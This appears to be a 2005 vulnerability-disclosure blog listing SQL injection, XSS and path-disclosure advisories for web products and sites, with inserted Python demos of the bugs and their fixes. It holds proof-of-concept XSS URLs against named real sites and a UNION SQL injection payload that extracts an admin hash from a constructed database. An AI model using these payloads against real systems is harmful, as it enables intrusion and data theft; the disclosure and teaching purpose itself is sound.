    Database driven web software designed for the heat-transfer imprint, impact print shop to sell promotional items online. (similar to CafePress.com, but you can add any imprintable product you like) Have your customers create their own products, such as T-shirts, mugs, mousepads, boxers, aprons, coasters and so on, with real-time preview. Complete print web service package, Product management, Add product samples, Order tracking, Add company logo, CMS, Real-time customer photo upload, Shopping cart, Online commerce, and Multi-language support


    Vuln. description:
    Input passed to the "product_id" parameter in "create.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    example:
    /create.php?action=create&product_id=[SQL]


    Solution:
    Edit the source code so that "product_id" is cast to an integer or bound as a query parameter instead of being concatenated into SQL.

    Landshop Real Estate Commerce System Vuln.

    Vuln. discovered by : r0t
    Date: 5 dec. 2005
    Vendor:http://www.landshop.gr/en/index.htm
    affected version: 0.6.3 and prior

    Product Description:
    LandShop is a free system for presentation and sales of real estate through the internet. It offers:
    - PDF generation on the fly for administrators and visitors
    - creation of wishlists for visitors that can be sent by email
    - multi-language capabilities: English, French, Spanish, German and Greek preinstalled
    - Support for Google maps
    - Currency conversion
    - Extensive configuration options for administrators
    - Multiple users and user levels (administrator, operator)


    Vuln. description:
    Input passed to the "start", "search_order", "search_type", "search_area" and "keyword" parameters in "ls.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    Also, input passed to the "lang" parameter in "ls.php" isn't validated before being used to select a language file; requesting a language that does not exist makes the script reveal its full installation path (full path disclosure).

    example:
    /ls.php?lang=en&action=list&start=[SQL]

    /ls.php?lang=en&action=list&start=0&CAT_ID=3&keyword=&search_area=&search_type=&infield=&search_order=[SQL]

    /ls.php?lang=en&action=list&start=0&CAT_ID=3&keyword=&search_area=&search_type=[SQL]

    /ls.php?lang=en&action=list&start=0&CAT_ID=3&keyword=[SQL]

    /ls.php?lang=en&action=list&start=0&CAT_ID=3&keyword=&search_area=[SQL]



    /ls.php?lang=[CODE]


    Solution:
    Edit the source code so that request parameters are never concatenated into SQL (bind "keyword", "search_type" and "search_area" as query parameters, cast "start" to an integer, and check "search_order" against a fixed list of column names), and so that the "lang" value is accepted only if it names one of the installed language files.
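The two file-selection bugs on this page share one root cause: a request parameter ("dir" in News Portal's arhiva.php, "lang" in Widget Property's property.php and Landshop's ls.php) is joined onto a filesystem path unchecked. The Python below is an added example, not code from any of these products. It rebuilds both bugs against a throwaway directory tree (layout, file names and contents are constructed for the demo) and shows the fix for each: realpath containment for a user-supplied directory, and a fixed allowlist for a language name.

```python
import os
import tempfile


def build_site() -> str:
    """Constructed stand-in for a web root: an archive tree, a language
    directory and a config file an attacker would want to reach."""
    root = tempfile.mkdtemp(prefix="site_")
    os.makedirs(os.path.join(root, "arhiva", "2005"))
    os.makedirs(os.path.join(root, "lang"))
    for rel, body in (("arhiva/2005/nov.txt", "november archive"),
                      ("lang/en.php", "english strings"),
                      ("config.php", "db_password=secret")):
        with open(os.path.join(root, rel), "w") as f:
            f.write(body)
    return root


# --- arhiva.php?dir=../ -----------------------------------------------------

def list_archive_vulnerable(root: str, user_dir: str) -> list:
    # what the affected script does: the parameter is appended to the path as-is,
    # so "../" walks out of the archive into the web root
    return sorted(os.listdir(os.path.join(root, "arhiva", user_dir)))


def list_archive_hardened(root: str, user_dir: str) -> list:
    # resolve symlinks and ".." first, then insist the result is still under the
    # archive directory; a string-prefix check on the unresolved path is not enough
    base = os.path.realpath(os.path.join(root, "arhiva"))
    target = os.path.realpath(os.path.join(base, user_dir))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError(f"refused: {user_dir!r} leaves the archive")
    return sorted(os.listdir(target))


# --- property.php?lang=r0t / ls.php?lang=r0t --------------------------------

def load_language_vulnerable(root: str, lang: str) -> str:
    # the PHP pattern is include("lang/$lang.php"): a name that does not exist
    # typically makes the interpreter print a warning containing the absolute
    # path, which is the full path disclosure the advisories describe. Here the
    # OSError carries the same path.
    with open(os.path.join(root, "lang", f"{lang}.php")) as f:
        return f.read()


LANGUAGES = {"en", "fr", "de"}   # hypothetical set of installed language files


def load_language_hardened(root: str, lang: str) -> str:
    # the value is only ever a key into an allowlist; anything else gets the default
    if lang not in LANGUAGES:
        lang = "en"
    with open(os.path.join(root, "lang", f"{lang}.php")) as f:
        return f.read()


def leaked_path(root: str, lang: str) -> str:
    """Return the path an attacker learns from the vulnerable loader's error,
    or "" if nothing leaks."""
    try:
        load_language_vulnerable(root, lang)
    except OSError as e:
        return e.filename or ""
    return ""


if __name__ == "__main__":
    root = build_site()
    print(list_archive_vulnerable(root, "../"))      # config.php is listed: traversal
    print(leaked_path(root, "r0t"))                  # absolute path: disclosure
    print(list_archive_hardened(root, "2005"), load_language_hardened(root, "r0t"))
```

The containment check compares resolved paths, so `2005/../../config.php` and a symlink planted inside the archive are both refused; the language loader never uses the request value as a path component at all, only as a lookup key, which is the right shape whenever the set of valid files is known at deploy time.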

    Relative Real Estate Systems SQL inj. vuln.

    Vuln. discovered by : r0t
    Date: 5 dec. 2005
    Vendor:http://www.dboorn.com/estate/
    affected version:1.02 and prior

    Product Description:
    Elegant real estate script that allows for unlimited listings and agents with featured listings, unlimited photos, advanced search engine, user login option, user tracking, dynamic slide shows, Mls/Idx support, multiple agents with photo, mortgage calculator, schools info, C.M.A. request form, full admin panel, much more...

    Vuln. description:
    Input passed to the "mls" parameter in "index.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    example:
    /index.php?name=&price_from=&price_to=&city=&state=SC&mls=[SQL]&bathroom=-1&bedrooms=-1&go=search&results=1

    Solution:
    Edit the source code so that "mls" is bound as a query parameter instead of being concatenated into SQL.

    Saturday, December 03, 2005

    phpYellowTM Pro Edition SQL inj. vuln.

    Vuln. discovered by : r0t
    Date: 3 dec. 2005
    Vendor:http://phpyellow.com/
    affected version: phpYellowTM Pro Edition 5.33 and phpYellowTM Lite Edition 5.33

    Product Description:

    Profit from web yellow pages. Brandable interface. Recurring revenue potential. Easily create web yellow pages. phpYellow Pro EditionTM is the software of choice for making and managing web yellow pages. Secure. Stealth EmailTM protects 100% of listing email addresses. Member & Webmaster login. Online demo. PHP/MySQL open source, no encryption, has source code comments. Flexible and varied searches include Search by Map, Keyword, Smart BrowseTM, HyperSearchTM, Find Needle in Haystack, State Search, Category and City Search, Sub-index. Search and public display template is customizable with PHP programming skills. Free, paid and renamable listing types. Set your own prices. Paypal gateway included. Customization and installation is also available for an additional fee. This is the ORIGINAL phpYellow Pages. Try our online demo or download the free Lite Edition. See how easy it is to start your own online business directory - with revenue potential.

    Vuln. Description:


    Input passed to the "haystack" parameter in "search_result.php" and "ckey" parameter in "print_me.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


    example:
    /search_result.php?search=url&haystack=[SQL]
    /print_me.php?ckey=[SQL]

    Solution:
    Edit the source code so that "haystack" and "ckey" are bound as query parameters (or cast to integers where they are ids) instead of being concatenated into SQL.
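Every SQL injection advisory on this page (Cars Portal, HobSR, the Web4Future products, Widget Property and Imprint, Landshop, Relative Real Estate, phpYellow) is the same bug in one of three places: a free-text search value ("haystack", "keyword", "s"), a sort column ("arrange", "sortb", "search_order") or a number used as an id or LIMIT offset ("start", "p", "pg"). The Python/SQLite code below is an added example, not code from any of these products: it runs one representative query the vulnerable way and the fixed way against a constructed listings table (table, column and parameter names, and the password hash, are made up for the demo) so the effect of a payload in each position can be seen. The fix differs by sink: values are bound as parameters, numbers are cast, and a sort column, which cannot be bound, is looked up in an allowlist.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: a listings table and the admin table an
    attacker is really after."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE listing (id INTEGER PRIMARY KEY, title TEXT, price INTEGER, published INTEGER);
        INSERT INTO listing VALUES (1, 'Flat in Athens',   90000, 1);
        INSERT INTO listing VALUES (2, 'House in Patras', 150000, 1);
        INSERT INTO listing VALUES (3, 'Withdrawn plot',   20000, 0);
        CREATE TABLE admin_user (name TEXT, password_hash TEXT);
        INSERT INTO admin_user VALUES ('admin', 'e99a18c428cb38d5f260853678922e03');
    """)
    return db


def search_vulnerable(db, keyword: str, order: str, start: str) -> list:
    # the pattern behind the advisories: request values dropped straight into the string
    sql = ("SELECT id, title FROM listing WHERE published = 1 "
           f"AND title LIKE '%{keyword}%' ORDER BY {order} LIMIT 10 OFFSET {start}")
    return db.execute(sql).fetchall()


SORTABLE = {"id", "title", "price"}   # the only column names the sort parameter may select


def search_hardened(db, keyword: str, order: str, start: str) -> list:
    column = order if order in SORTABLE else "id"   # identifier: allowlist, never bind or concat
    try:
        offset = max(int(start), 0)                 # number: cast; garbage becomes 0
    except ValueError:
        offset = 0
    sql = ("SELECT id, title FROM listing WHERE published = 1 "
           f"AND title LIKE ? ORDER BY {column} LIMIT 10 OFFSET ?")
    return db.execute(sql, (f"%{keyword}%", offset)).fetchall()   # values: bound


def run_demo() -> dict:
    """One payload per sink; returns what an attacker gets from the vulnerable
    query next to what the hardened query gives for the same input."""
    db = make_db()
    out = {}
    # 1. search string: close the quote, UNION in the admin table, comment out the rest
    kw = "x%' UNION SELECT name, password_hash FROM admin_user --"
    out["union_vuln"] = search_vulnerable(db, kw, "id", "0")
    out["union_safe"] = search_hardened(db, kw, "id", "0")
    # 2. sort column: no output needed, the row order itself answers a yes/no question
    probe = "CASE WHEN (SELECT count(*) FROM admin_user) > 0 THEN -price ELSE id END"
    out["order_vuln"] = [r[0] for r in search_vulnerable(db, "", probe, "0")]
    out["order_safe"] = [r[0] for r in search_hardened(db, "", probe, "0")]
    # 3. offset: a non-number surfaces as a database error, the usual first sign of the bug
    try:
        search_vulnerable(db, "", "id", "r0t")
        out["offset_vuln_error"] = False
    except sqlite3.OperationalError:
        out["offset_vuln_error"] = True
    out["offset_safe"] = [r[0] for r in search_hardened(db, "", "id", "r0t")]
    return out


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key:18} {value}")
```

The ORDER BY probe is the one to remember: the products' sort parameters ("arrange", "sortb", "search_order") are the hardest to fix with escaping, because quoting does nothing for an identifier and the attacker needs no error message, only a change in row order. Escaping functions such as mysql_real_escape_string() help for the quoted string case only; the allowlist is the fix for the other two.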

    The European Hacker Conference

    The 22nd Chaos Communication Congress (22C3) is a four-day conference on technology, society and utopia. The Congress offers lectures and workshops on a multitude of topics including (but not limited to) information technology, IT-security, internet, cryptography and generally a critical-creative attitude towards technology and the discussion about the effects of technological advances on society.

    The Chaos Communication Congress is the annual congress of the Chaos Computer Club e.V. (CCC). The Congress has established itself as the "European Hacker Conference" bringing in people from all over Europe and even further away.

    The congress not only addresses the techno geek but also those who are interested in applications and consequences. A part of the lectures will be held in English, the rest in German. The language used for each lecture is clearly marked in the conference program.

    http://events.ccc.de/congress/2005/



    If you are from Germany or from Europe I think you must know CCC; I will be there just to chill and meet friends, so the last meeting point this year will be in Berlin!

    MyTemplateSite XSS vuln.

    Vuln. discovered by : r0t
    Date: 3 dec. 2005
    vendor:http://www.infinetsoftware.com/products/mts/default.asp
    affected version: 1.2 and prior

    Product Description:
    Create your own template site with MyTemplateSite. MyTemplate site is an out-of-the-box, full featured template site solution. The software handles management, publishing, ordering, and secure downloading. Seamless PayPal/2Checkout integration.

    Vuln. Description:
    Input passed to the "q" parameter in "search.asp" isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


    Solution:
    Edit the source code so that the "q" value is HTML-encoded (e.g. with Server.HTMLEncode) before being echoed into the page.

    ASPS Shopping Cart Professional and Lite XSS vuln

    Vuln. discovered by : r0t
    Date: 3 dec. 2005
    Vendor:http://www.aspsolutions.com.au/
    affected version:
    ASPS Shopping Cart Professional 2.9d and prior
    ASPS Shopping Cart Lite V2.1 and prior


    Product Description:
    Developed using asp/vb scripting – full source code supplied without encryption, complete cms, helpdesk to log enquiries, unlimited number of categories/subcategories, products and currencies, innovative Studio online browser, no dll's to install, supports Access 2000 or above (SQL Server v7+ will be available by 30th April – if you require this urgently please email us as we can sell you our current version which is close to release), easy to alter language files and template design, supports most SSL certificates (please let us know if your certificate is not supported as we aim to support as many as we can), credit card details encrypted for added security, multiple super administrators and standard administrators, reward your clients with sale points which can be used for purchasing, invoice your clients using your shopping cart with payment methods including recurring payments (great for hosting invoices), create promotional discount coupons for clients. Optional: add Web Wiz Forum to cart.



    Vuln. Description:
    Input passed to the "srch_product_name" parameter in "adv_search.asp" and "b_search" parameter in "bsearch.asp" isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


    example:
    /products/adv_search.asp?srch_product_name=%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E&srch_product_price1=&srch_product_price2=&srch_product_stocknumber=&srch_product_category=&advance_submit=Search


    /products/bsearch.asp?b_search=%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E&x=12&y=7


    Solution:
    Edit the source code so that "srch_product_name" and "b_search" are HTML-encoded (e.g. with Server.HTMLEncode) before being echoed into the page.
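The cross-site scripting entries on this page, from the "[XSS]" placeholders in the search.cgi advisories down to the encoded alert() PoCs in this one, all describe a search form echoing its query string back unencoded. The Python below is an added example, not code from ASPS or any other product listed. It decodes the bsearch.asp PoC above, renders it through a constructed results-page template the vulnerable way, the HTML-encoded way and with a typical blacklist "fix", and adds the probe a tester uses to tell them apart: inject a marker followed by < > " ' and see which of the four come back raw.

```python
import html
from urllib.parse import urlsplit, parse_qs

# The bsearch.asp PoC from the advisory above, exactly as published.
POC_URL = "/products/bsearch.asp?b_search=%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E&x=12&y=7"


def param(url: str, name: str) -> str:
    """Decoded value of one query parameter of a PoC URL."""
    return parse_qs(urlsplit(url).query)[name][0]


# Three constructed stand-ins for the search results page -----------------------

def render_vulnerable(term: str) -> str:
    # the affected scripts' behaviour: the raw query string goes into the markup,
    # once as text and once inside a single-quoted attribute
    return f"<h1>Results for: {term}</h1><input name=\"b_search\" value='{term}'>"


def render_blacklist(term: str) -> str:
    # a common non-fix: strip one tag name. <img src=x onerror=...> or breaking out
    # of the attribute with a quote still works
    return render_vulnerable(term.replace("<script>", "").replace("</script>", ""))


def render_hardened(term: str) -> str:
    # encode on output, quotes included, so the value is inert in text and attribute context
    safe = html.escape(term, quote=True)
    return f"<h1>Results for: {safe}</h1><input name=\"b_search\" value='{safe}'>"


PROBE_CHARS = "<>\"'"
ENCODINGS = {"<": ("&lt;",), ">": ("&gt;",), '"': ("&quot;", "&#34;"), "'": ("&#x27;", "&#39;")}


def surviving_chars(render, token: str = "r0tXSS") -> str:
    """Reflect token+<>"' through `render` and report which of the four characters
    came back unencoded at the first reflection point."""
    page = render(token + PROBE_CHARS)
    pos = page.find(token)
    if pos < 0:
        return ""                        # not reflected at all
    pos += len(token)
    raw = []
    for c in PROBE_CHARS:
        if page.startswith(c, pos):
            raw.append(c)
            pos += 1
            continue
        enc = next((e for e in ENCODINGS[c] if page.startswith(e, pos)), None)
        if enc is None:                  # filtered or stripped: cannot judge the rest
            break
        pos += len(enc)
    return "".join(raw)


if __name__ == "__main__":
    payload = param(POC_URL, "b_search")
    print(payload)                                   # <script>alert('r0t')</script>
    for name, render in (("vulnerable", render_vulnerable),
                         ("blacklist", render_blacklist),
                         ("hardened", render_hardened)):
        print(f"{name:11} raw chars: {surviving_chars(render)!r}")
```

The probe is why a tester does not stop at the published alert() payload: the blacklist version makes that exact PoC "fail" while every dangerous character still reflects, and the probe reports it. Against the hardened template it reports nothing because each character comes back as its entity; the page may still be unsafe if the same value is also written into a JavaScript string or an unquoted attribute, so the probe is run once per reflection point, not once per page.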

    Solupress News XSS vuln

    Vuln. discovered by : r0t
    Date: 3 dec. 2005
    Vendor:http://www.inspironetworks.com/solupress/solupress_news.html
    affected version:1.0 and prior

    Product Description:
    Solupress News is a comprehensive online news publishing system. Place news and events online easily, without the need for expensive web developers. Articles can have images, audio, video, and indeed any other type of file uploaded with them. The output is what you'd expect from a professional news web site like the nytimes.com or the latimes.com. The AutoActivation feature in Solupress automatically posts your articles online on the date you specify, so you can have your news web site maintain itself while you're on vacation. In addition, a WAP interface allows mobile device users with Internet access to view news, scores, and events on their devices. Solupress works with either a SQL Server or MS Access database.

    Vuln. Description:
    Input passed to the "keywords" parameter in "search.asp" isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


    example:
    /search.asp?option=simple&keywords=%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E&submit1=Find


    Solution:
    Edit the source code so that the "keywords" value is HTML-encoded (e.g. with Server.HTMLEncode) before being echoed into the page.

    SiteBeater MP3 Catalog XSS vuln

    Vuln. discovered by : r0t
    Date: 3 dec. 2005
    vendor:http://www.sitebeater.com/Radio/
    affected version: 2.03 and prior


    Product Description:
    MP3 upload, lightning fast ID3 tag reading or enter your own song data, CD purchase info, search, private, public or random playlists, multi-domain, load-balancing, multi-lingual, mailing lists, themes, user management, over 50 rights, and much more! Uses ASP & MSSQL.



    Vuln. Description:
    Input passed to the search parameters in "Search.asp" isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.



    Solution:
    Edit the source code so that the search values are HTML-encoded (e.g. with Server.HTMLEncode) before being echoed into the page.

    Sitebeater News System XSS vuln.

    Vuln. discovered by : r0t
    Date: 3 dec. 2005
    Vendor:http://www.sitebeater.com/News/
    affected version: 4.00 and prior

    Product Description:
    News Features: mailing lists, polls, themes, attachments, search, categories, related article links, send to friends, discuss article, independent editors, more! Uses ASP & MSSQL. Also includes all of this: Portal creation system and user management, polls, mailing lists, themes, macros, account groups, user profiling, custom rights, API, more! Available plug-ins include: Message Board, Image Gallery, MP3 Catalog and News Systems. Uses ASP & MSSQL. User Management System, polls, mailing lists. Features: cross-domain user management, sharing of user data across domains, custom user rights, group management, unlimited profiling, API, more! Uses ASP & MSSQL. Complete image display system for your website. Requires ASP & MSSQL. Includes dynamic creation of thumbnails, image upload, locked galleries, .zip or ftp bulk import, unlimited categories, more. With unlimited expandability, flexibility and power, the SiteBeater Message Board is your complete user friendly solution. Message Board features: mailing lists, polls, powerful administration, file attachments, color themes, multi-lingual, multiple views, search, user preferences, send-to-friends, print preview, alert administrator, profanity filter, sorting, rating, more! Uses ASP & MSSQL.


    Vuln. Description:
    Input passed to the search module's keywords parameter ("sKeywords" in the example below) isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


    example:

    /ArticleDisplay/Archive.asp?DOMAIN_Link=&sSort=SubmitDate
    &iSearchID=389&sKeywords=%3Cscript%3Ealert%28%27r0t%27%29
    %3C%2Fscript%3E

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Friday, December 02, 2005

    careerbuilder.com XSS vuln.

    Vuln. discovered by : r0t
    Date: 2 dec. 2005


    Vuln. Description:
    Input passed to the search parameters in "JobResults.aspx" isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

    example:
    /JobResults.aspx?S%3Asbkw=%3Cscript%3Ealert%
    28%27r0t+llove+XSS%27%29%3C%2Fscript%3E&S%3
    Asbcn=%3Cscript%3Ealert%28%27r0t+llove+XSS%
    27%29%3C%2Fscript%3E&S%3Asbsn=ALL&S%3Asbfr=
    30&S%3Asbsbmt=Search&cid=US&IPath=ILKG&excr
    it=QID%3DA6652282763367%3Bst%3DA%3Buse%3DAL
    L%3BrawWords%3D%3Cscript%3Ealert%28%27r0t+l
    loves+XSS%27%29%3C%2Fscript%3E%3BTID%3D0%3B
    CTY%3D%3Cscript%3Ealert%28%27r0t+lloves+XSS%
    27%29%3C%2Fscript%3E%3BSID%3DALL%3BCID%3DUS
    %3BENR%3DNO%3BDTP%3DDR3%3BYDI%3DYES%3BIND%3
    DALL%3BPDQ%3DAll%3BJN%3DAll%3BPAYL%3D0%3BPA
    YH%3DGT120%3BPOY%3DNO%3BETD%3DALL%3BRE%3DALL
    %3BMGT%3DDC%3BSUP%3DDC%3BFRE%3D30%3BCHL%3DA
    L%3BQS%3DSID_UNKNOWN%3BSS%3DNO%3BTITL%3D0%3
    BJQT%3DRAD%3BEXJT%3D%3Cscript%3Ealert%28%27
    ll%27%29%3C%2Fscript%3E

    icq.com XSS vuln.

    Vuln. discovered by : r0t
    Date: 2 dec. 2005

    Vuln. Description:
    Input passed to the "uSearchString" parameter in "search_results.php" isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


    example:
    /boards/search_results.php?uSearchString=
    %3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Confluence – the Enterprise Wiki, XSS vuln.

    Vuln. discovered by : r0t
    Date: 2 dec. 2005
    Vendor:http://www.atlassian.com/software/confluence/
    affected version: 2.0.1 Build:#321 Nov 28, 2005

    Product Description:
    Confluence is an enterprise wiki that makes it easy for your team to collaborate and share knowledge. Confluence - The Enterprise Wiki. Adding, sharing and finding content has never been easier.
    These benefits come with all the additional features needed to make it a part of your business:

    * Enterprise security
    * Simple installation and management
    * Attractive, user-friendly interface
    * Powerful tools for structuring and searching your wiki
    * Professional features such as PDF export and automated refactoring
    * An open API for extension and integration
    * Atlassian's Legendary Service.


    Vuln. Description:
    Input passed to the search module parameters isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    JSE XSS vuln.

    Java Search Engine XSS vuln.

    Vuln. discovered by : r0t
    Date: 2 dec. 2005
    Vendor:http://www.me.lv/jse/index.html
    affected version:0.9.34

    Product Description:
    Java Search Engine is a server-side search engine program for web sites. Search engines provide to the site visitors easy and fast way to find what they want on your site. If you want to have search engine on your site - you can try Java Search Engine. It is easy, just follow instructions on this page.
    Java Search Engine has common Java API interfaces such as JSP, servlets and EJB. Can save results as XML and transform them into HTML using XSLT stylesheets.
    Java Search Engine is a complete solution: you don't have to create a crawler for it, you don't have to install or integrate it with any database if you don't want to, and you don't have to use any other additional software (except the JDK, of course). This search engine is familiar to your visitors - it has the same query language and output interface as Google.

    Vuln. Description:
    Input passed to the "q" parameter in "search.jsp" isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

    example:
    /search.jsp?oe=english&q=%3Cscript%3Ealert
    %28%27r0t%27%29%3C%2Fscript%3E&qor=

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Thursday, December 01, 2005

    QualityPPC XSS vuln.

    Vuln. discovered by : r0t
    Date: 1 dec. 2005
    Vendor:http://www.qualityebiz.com/main/qppc.php
    affected version:1553 and prior

    Product Description:
    QualityPPC has the latest technology which offers you more potential to generate revenue. All future upgrades are free and continue. Current features: 35+ pre-installed XML feeds, country filter for local/XML traffic, listing by indexing or rotation, multiple member types for your affiliates, support for PayPal, Egold and MoneyBooker, online elite proxy finder, and many option settings which can be flexibly fit to your business preferences. You get everything at a reasonable price.


    Vuln. Description:
    Input passed to the parameters in search module isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Free ClickBank Search Engine SQL inj. vuln.

    Vuln. discovered by : r0t
    Date: 1 dec. 2005
    Vendor:http://phpfreebies.com/free-clickbank-search-engine-script.php
    affected version:1.0 and prior


    Product Description:

    Free PHP/MySQL script allows you to add the thousands of products from the Clickbank® Marketplace directory to your website with your affiliate nickname. This will allow you to earn up to 75% commission per sale on each and every one. Feel free to download and use this script on any website.


    Vuln. Description:

    Input passed to the "keywords" parameter in "search.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    example:
    /search.php?keywords=[SQL]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Interspire FastFind 2005 XSS vuln.

    Vuln. discovered by : r0t
    Date: 1 dec. 2005
    Vendor:http://www.interspire.com/fastfind/
    affected version: 2005 and 2004 version.

    Product Description:
    Add powerful, flexible search to your site in minutes. FastFind is the leading PHP search engine, featuring: point and click web based interface, simple 3 step installation wizard, 100% rebrandable, automated scheduling, advanced filtering, and much, much more. Download Interspire FastFind 2005 now and have search setup on yours/your clients site in minutes!


    Vuln. Description:
    Input passed to the "query" parameter isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

    example:
    /?query=%3Cscript%3Ealert%28%27r0t%20
    love%20XSS%27%29%3C%2Fscript%3E&type=
    advanced&results=20&searchType=1

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    InfoSpace® search engines XSS vuln.
    InfoSpace search engines are vuln. to XSS attacks.

    Vuln. discovered by : r0t
    Date: 1 dec. 2005
    Vendor:http://www.infospaceinc.com/
    affected version: latest :) There are more than 3 types of search engines and all of them are vuln.

    About Products:
    InfoSpace is one of the leading online directory services providers on the Internet. Our award-winning directory sites include Switchboard® and InfoSpace®. Our online yellow page sites are designed to make it easier for users to locate businesses, people and information online, while creating optimal revenue opportunities for advertisers and listings partners, such as Verizon SuperPages, BellSouth, and Dex Media.

    InfoSpace's online directory products are uniquely structured and highly interactive to help users quickly and easily locate businesses that satisfy their needs. Besides yellow page listings, they offer a variety of other useful services, including white pages, maps and directions, public records, and more.

    InfoSpace's metasearch technology searches the most popular engines including Google, Yahoo!, MSN Search, Ask Jeeves and more, and returns the best results from each.

    Metasearch
    InfoSpace's branded search sites Dogpile®, WebCrawler®, MetaCrawler® and WebFetch™ make it easy to search more of the Web and find relevant results fast.

    By combining the relevancy weightings of multiple engines, InfoSpace metasearch returns the best results the Web has to offer, providing users with a more powerful and comprehensive way to search. In short, metasearch allows users to search up to 50% more of the Web than any single engine.

    Because metasearch aggregates results including paid advertising from several sources, each of InfoSpace's branded search sites are better able to monetize search than any single search engine.



    Vuln. Description:

    Input passed to the InfoSpace search engine parameters isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


    Example of InfoSpace Search engines:

    http://msxml.webcrawler.com/info.wbcrwl/search/
    web/%253Cscript%253Ealert(%2527r0t%252Blloves%2
    52BXSS%2527)%253C%252Fscript253E/1/-/1/-/-/-/-/
    -/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-
    /-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/417/
    top

    http://www.metacrawler.com/info.metac/search/web
    /%253Cscript%253Ealert(%2527r0t%2Blloves%2BXSS%2
    527)%253C%252Fscript253E/1/-/1/-/-/-/-/-/-/-/-/-
    /-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-
    /-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/417/top

    http://www.dogpile.com/info.dogpl/search/web/%253
    Cscript%253Ealert(%2527r0t%252Blloves%252BXSS%252
    7)%253C%252Fscript%253E/1/-/1/-/-/-/-/-/-/-/-/-/-
    /-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/
    -/-/-/-/-/-/-/-/-/-/-/-/-/-/-/417/top

    http://www.webfetch.com/uk.webfetch/search/web/%2
    53Cscript%253Ealert(%2527r0t%2Blloves%2BXSS%2527)
    %253C%252Fscript%253E/1/-/1/-/-/-/-/-/-/-/-/-/-/-/
    -/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/
    -/-/-/-/-/-/-/-/-/-/-/-/-/417/top?engineset=uk-onl
    y_oando



    http://www.switchboard.com/bin/cgiqa.dll?SR=&MEM=1
    &QV=24F925BAB8114FE185F3F69AD09FD7A0l02811611743C8
    74343313203O01811711743C87434D313203O03872D3DA93C8
    74316303203&LNK=14%3A21&F=&L=%3Cscript%3Ealert%28%
    27r0t+love+XSS%27%29%3C%2Fscript%3E&T=&S=&Z=&image
    1.x=24&image1.y=9


    Example in AOL:

    http://whitepages.aol.com/_1_2LJMU7R09YLVHU__aolwp.aolw/
    white-pages/noresults.htm?kcfg=wpus&otmpl=%2Fwhite-pages
    %2Fresults.htm&qfm=n&qk=5&top=internal&qname=%3Cscript%3
    Ealert%28%27r0t%2Blove%2BXSS%27%29%3C%2Fscript%3E&qs=&se
    archtype=citystate&qn=%3Cscript%3Ealert('r0t+love+XSS')
    %3C/script%3E&qf=&qc=

    Example on Excite.com
    http://msxml.excite.com/info.xcite/search/web/%253Cscript
    %253Ealert(%2527r0t%2Blloves%2BXSS%2527)%253C%252Fscript%
    253E

    Other examples:
    http://www.webmarket.com/info.webmkt/results.htm?qkw=%3Cs
    cript%3Ealert%28%27r0t%2Blloves%2BXSS%27%29%3C%2Fscript%3E

    http://www.classifieds2000.com/_1_W1U7R0GZW8ML__info.cls2k
    /classads/results.htm?qkw=%3Cscript%3Ealert%28%27r0t%2Bllo
    ves%2BXSS%27%29%3C%2Fscript%3E

    http://msxml.infospace.com/_1_2N6MU7R09I3ROK__info.nbci/se
    arch/web/%253Cscript%253Ealert(%2527r0t%2Blloves%2BXSS%252
    7)%253C%252Fscript%253E



    Even Mamma.com, which is only a partner of InfoSpace, has the same vuln. type.

    example:

    http://www.mamma.com/Mamma?qtype=&query=%3Cscript%3
    Ealert%28%27r0t+llove+XSS%27%29%3C%2Fscript%3E


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    NetClassifieds all versions SQL inj. vuln

    Vuln. discovered by : r0t
    Date: 1 dec. 2005
    Vendor:http://scriptdevelopers.net/
    affected version:
